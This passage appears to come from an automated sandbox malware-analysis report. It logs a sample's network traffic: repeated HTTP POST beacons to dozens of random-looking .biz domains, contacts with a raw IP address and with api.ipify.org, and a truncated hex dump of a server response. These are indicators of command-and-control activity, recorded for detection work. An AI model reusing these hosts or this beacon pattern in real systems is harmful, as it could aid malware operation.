Source: global traffic HTTP traffic detected: POST /qmsckions HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jpral HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kaxprjwfiybl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /eyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tqtlouxtvhvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ckgw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cceha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nkpyoqcnfxfvdsvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ocoeycxqebnmcofx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mbcjcfmxxflkpmuo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vdswmyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jdxpe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cfhujvjhaho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jmsidvkpax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /umjblkbuugg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /huutba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /u HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /njmokryu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ucx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rvqem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rngnlo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ociacchi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nifaqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fnji HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bsjqpgxufr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kuxiqsojkmip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrnrnpb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgikxpkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /llhapbqwborcds HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /suw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pcsirhcwmnroqpc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qakf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gtcuyk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pjgdeytc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /imppcncbrvlqyyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic DNS traffic detected: DNS query: esuzf.biz
Source: global traffic DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic DNS traffic detected: DNS query: brsua.biz
Source: global traffic DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic DNS traffic detected: DNS query: gcedd.biz
Source: global traffic DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic DNS traffic detected: DNS query: xccjj.biz
Source: global traffic DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic DNS traffic detected: DNS query: uaafd.biz
Source: global traffic DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic DNS traffic detected: DNS query: tnevuluw.biz
Source: global traffic DNS traffic detected: DNS query: whjovd.biz
Source: global traffic DNS traffic detected: DNS query: gjogvvpsf.biz
Source: global traffic DNS traffic detected: DNS query: reczwga.biz
Source: global traffic DNS traffic detected: DNS query: bghjpy.biz
Source: global traffic DNS traffic detected: DNS query: damcprvgv.biz
Source: global traffic DNS traffic detected: DNS query: ocsvqjg.biz
Source: global traffic DNS traffic detected: DNS query: ywffr.biz
Source: global traffic DNS traffic detected: DNS query: ecxbwt.biz
Source: global traffic DNS traffic detected: DNS query: pectx.biz
Source: global traffic DNS traffic detected: DNS query: zyiexezl.biz
Source: global traffic DNS traffic detected: DNS query: banwyw.biz
Source: global traffic DNS traffic detected: DNS query: muapr.biz
Source: global traffic DNS traffic detected: DNS query: wxgzshna.biz
Source: global traffic DNS traffic detected: DNS query: zrlssa.biz
Source: global traffic DNS traffic detected: DNS query: jlqltsjvh.biz
Source: global traffic DNS traffic detected: DNS query: xyrgy.biz
Source: global traffic DNS traffic detected: DNS query: htwqzczce.biz
Source: global traffic DNS traffic detected: DNS query: kvbjaur.biz
Source: global traffic DNS traffic detected: DNS query: uphca.biz
Source: global traffic DNS traffic detected: DNS query: fjumtfnz.biz
Source: global traffic DNS traffic detected: DNS query: hlzfuyy.biz
Source: global traffic DNS traffic detected: DNS query: rffxu.biz
Source: global traffic DNS traffic detected: DNS query: cikivjto.biz
Source: global traffic DNS traffic detected: DNS query: qncdaagct.biz
Source: global traffic DNS traffic detected: DNS query: shpwbsrw.biz
Source: global traffic DNS traffic detected: DNS query: cjvgcl.biz
Source: global traffic DNS traffic detected: DNS query: neazudmrq.biz
Source: global traffic DNS traffic detected: DNS query: pgfsvwx.biz
Source: global traffic DNS traffic detected: DNS query: aatcwo.biz
Source: global traffic DNS traffic detected: DNS query: kcyvxytog.biz
Source: global traffic DNS traffic detected: DNS query: nwdnxrd.biz
Source: global traffic DNS traffic detected: DNS query: ereplfx.biz
Source: global traffic DNS traffic detected: DNS query: ptrim.biz
Source: unknown HTTP traffic detected: POST /ibmog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 868
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 06 Sep 2024 11:07:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 